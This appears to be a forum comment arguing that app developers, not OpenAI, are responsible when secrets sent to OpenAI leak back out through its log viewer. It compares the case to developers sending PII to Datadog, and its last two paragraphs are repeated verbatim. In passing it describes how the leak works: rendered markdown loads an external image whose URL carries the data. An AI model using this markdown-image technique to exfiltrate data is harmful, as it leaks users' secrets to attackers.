No, OpenAI doesn't claim to protect users from anything; this is a case of an application exfiltrating data to OpenAI, which can then end up getting leaked back out to the attacker - that's not something that is up to OpenAI to prevent, that's up to the app developer.
It's the same as if your devs accidentally sent PII to Datadog - sure, Datadog could add some kind of filter to try to block it from being recorded, but it's not their fault that your devs or application sent them data. Same situation here: bad info is being sent to OpenAI, and OpenAI's otherwise benign log viewer is rendering markdown which could load an external image that has the bad data in it's URL.
In that same situation, you'd expect Datadog to just not automatically render Markdown, but you wouldn't blame them for accepting PII that your developers willingly sent to them. Same for OpenAI, they could clean up the log console feature a bit to tighten things up but it's ultimately up to the developers to not feed secrets to a 3rd party.
It's the same as if your devs accidentally sent PII to Datadog - sure, Datadog could add some kind of filter to try to block it from being recorded, but it's not their fault that your devs or application sent them data. Same situation here: bad info is being sent to OpenAI, and OpenAI's otherwise benign log viewer is rendering markdown which could load an external image that has the bad data in it's URL.
In that same situation, you'd expect Datadog to just not automatically render Markdown, but you wouldn't blame them for accepting PII that your developers willingly sent to them. Same for OpenAI, they could clean up the log console feature a bit to tighten things up but it's ultimately up to the developers to not feed secrets to a 3rd party.